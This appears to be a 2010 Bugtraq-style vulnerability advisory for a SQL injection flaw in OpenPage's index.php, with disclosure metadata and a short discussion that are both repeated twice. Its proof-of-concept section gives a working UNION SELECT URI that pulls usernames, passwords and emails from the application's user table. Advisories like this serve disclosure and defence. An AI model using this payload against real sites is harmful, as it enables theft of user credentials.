OpenPage 'index.php' SQL Injection Vulnerability
BID:38888
Info
OpenPage 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 38888 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2010 12:00AM |
| Updated: | Mar 22 2010 12:00AM |
| Credit: | Phenom |
| Vulnerable: |
SPAD OpenPage 0 |
| Not Vulnerable: | |
Discussion
OpenPage 'index.php' SQL Injection Vulnerability
Openpage is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Openpage is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
OpenPage 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--